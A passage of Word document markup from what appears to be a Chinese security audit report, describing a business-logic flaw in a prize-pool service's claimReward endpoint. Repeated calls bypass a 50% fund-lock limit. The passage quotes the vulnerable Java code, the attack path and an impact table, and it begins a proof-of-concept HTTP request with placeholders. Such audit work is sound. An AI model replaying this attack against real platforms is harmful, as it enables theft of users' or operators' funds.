        <w:t>userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前，通过带条件的 CAS 更新（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UPDATE user_miner SET is_charged=1 WHERE id=? AND is_charged=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）确保原子性，并在更新行数为 0 时抛出冲突异常。</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807"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerController.java.charge → PowerService.java.charge → PowerService.java.getUnlockLevel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audit_m165_604_charge_ctrl-path5of6.md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：PrizePoolService.java#claimReward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_37" w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞36：重复领取奖励绕过资金锁定限制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="808"/>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claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 缺少已领取状态更新 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>effectiveAlreadyCounted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 未计算已领取额，导致重复领取绕过余额锁定比例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="809"/>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src/main/java/com/gameBack/mjservice/service/PrizePoolService.java:claimReward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="810"/>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业务逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="811"/>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12"/>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：已登录普通用户（需通过 KYC、level 2 配置 completionStatus=1）</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claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法存在两个相互叠加的缺陷，使已完成解锁条件的用户可通过多次调用该接口，将远超系统预期比例的资金转入可提现余额（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），从而绕过平台设计的资金锁定限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷一（开发者自注）：已领取的 `UsdtUserConfig` 其 `useStatus` 始终未被置为 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>代码中的筛选条件：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if (config.getCompletionStatus() != null &amp;&amp; config.getCompletionStatus() == 1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        &amp;&amp; (config.getUseStatus() == null || config.getUseStatus() == 0)) { // 未排除已领取档位，可重复 claimReward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">开发者自注 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>// 未排除已领取档位，可重复 claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已明确说明——配置记录在领取后从未被标记为已用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>useStatus = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），每次调用均可匹配到同一条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1, useStatus=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的配置，走入相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷二：`effectiveAlreadyCounted` 仅汇总提现申请记录，不追踪已领取但尚未提现的金额</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BigDecimal historicalTotalWithdrawn = account.getUsdtTotalWithdrawn() != null ? account.getUsdtTotalWithdrawn() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t>BigDecimal pendingSum = withdrawApplyRecordRepository.sumAmountByUserIdAndStatus(userId, ...STATUS_PENDING);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>BigDecimal effectiveAlreadyCounted = historicalTotalWithdrawn.add(pendingSum != null ? pendingSum : BigDecimal.ZERO);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在用户调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后、正式提交提现申请前，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>historicalTotalWithdrawn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pendingSum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均不会增加。于是在第二次调用时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>effectiveAlreadyCounted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍为 0（或与首次相同），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>stage2Theoretical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重新计算出同等数额，继续从账户中扣划资金进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usableBalance</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p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="813"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/prize/claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 校验 Bearer Token，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 由服务端 Token 解析注入（无伪造风险）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="814"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/prize/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径执行签名+nonce 防重放校验（可用新 nonce 绕过，因为每次请求只需提供合法的新 nonce）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="815"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PrizePoolService.claimReward(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FOR UPDATE 锁防止并发竞争，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无法阻止顺序多次调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>useStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 条件筛选不排除已领取配置 → 每次均匹配同一档位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>effectiveAlreadyCounted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 每次重新从零计算 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>stage2Theoretical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 未缩减</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimableAmount = min(stage2Theoretical, balance + freezeBalance)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 持续将 freeze 划入 usable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资金影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>以 Level 2 为例（设计为仅允许提现总余额的 50%）：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调用轮次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totalBalance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effectiveAlreadyCounted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stage2Theoretical</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available（balance+freeze）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claimableAmount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usableBalance 累计</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 1 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 2 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0（未提交提现）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500（仍有冻结余额）</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 3 次</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1000（止损于此）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>设计预期可提现上限：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>500 USDT（50%）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实际可提现金额：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1000 USDT（100%）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，超额 100%，绕过全部锁定限制。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入口：PrizePoolController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/claimReward")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;BigDecimal&gt; claimReward(@CurrentUserId Long userId) { // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal usableBalance = prizePoolService.claimReward(userId);     // ← 调用入 Service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(usableBalance);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 核心漏洞点：PrizePoolService.java claimReward()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public BigDecimal claimReward(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UsdtUserConfig&gt; configs = usdtUserConfigRepository.findByUserIdOrderByLockLevelAscForUpdate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // FOR UPDATE 仅防并发，不防顺序重复调用</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 缺陷一：useStatus 从未被更新为 1，每次调用均可命中同一档位</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (UsdtUserConfig config : configs) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (config.getCompletionStatus() != null &amp;&amp; config.getCompletionStatus() == 1</w:t>
              <w:br/>
              <w:t xml:space="preserve">                &amp;&amp; (config.getUseStatus() == null || config.getUseStatus() == 0)) { // ← 漏洞点：开发者自注"未排除已领取档位，可重复 claimReward"</w:t>
              <w:br/>
              <w:t xml:space="preserve">            configsToClaim.add(config);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 缺陷二：effectiveAlreadyCounted 仅统计提现申请记录，不包含已 claim 但未提现的金额</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal historicalTotalWithdrawn = account.getUsdtTotalWithdrawn() != null ? account.getUsdtTotalWithdrawn() : BigDecimal.ZERO; // ← 仅统计已审核提现</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal pendingSum = withdrawApplyRecordRepository.sumAmountByUserIdAndStatus(userId, ...STATUS_PENDING);                       // ← 仅统计 PENDING 提现申请</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal effectiveAlreadyCounted = historicalTotalWithdrawn.add(pendingSum != null ? pendingSum : BigDecimal.ZERO);              // ← 已领取但未提现的金额不计入，重复调用时仍为 0</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    switch (lockLevel) {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        case 2:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal stage2Target = totalBalance.divide(BigDecimal.valueOf(2), 2, RoundingMode.HALF_UP);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal stage2Theoretical = stage2Target.subtract(effectiveAlreadyCounted).max(BigDecimal.ZERO); // ← 因 effectiveAlreadyCounted=0，每次 stage2Theoretical 不变</w:t>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal available = balance.add(freezeBalance);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            claimableAmount = stage2Theoretical.min(available);  // ← 每次继续从 freeze 扣划，直到 available 归零</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            account.setUsdtUsableBalance(usableBalance.add(claimableAmount)); // ← 多次累加，突破 50% 上限</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // configToClaim.setUseStatus(1) 从未出现在可见代码中，与开发者自注一致</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第一次请求（获取 50% usable）：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/api/prize/claimReward HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>appKey: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>nonce: &lt;随机nonce_1&gt;</w:t>
              <w:br/>
              <w:t>sign: &lt;使用 nonce_1 计算的合法签名&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content-Type: application/json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
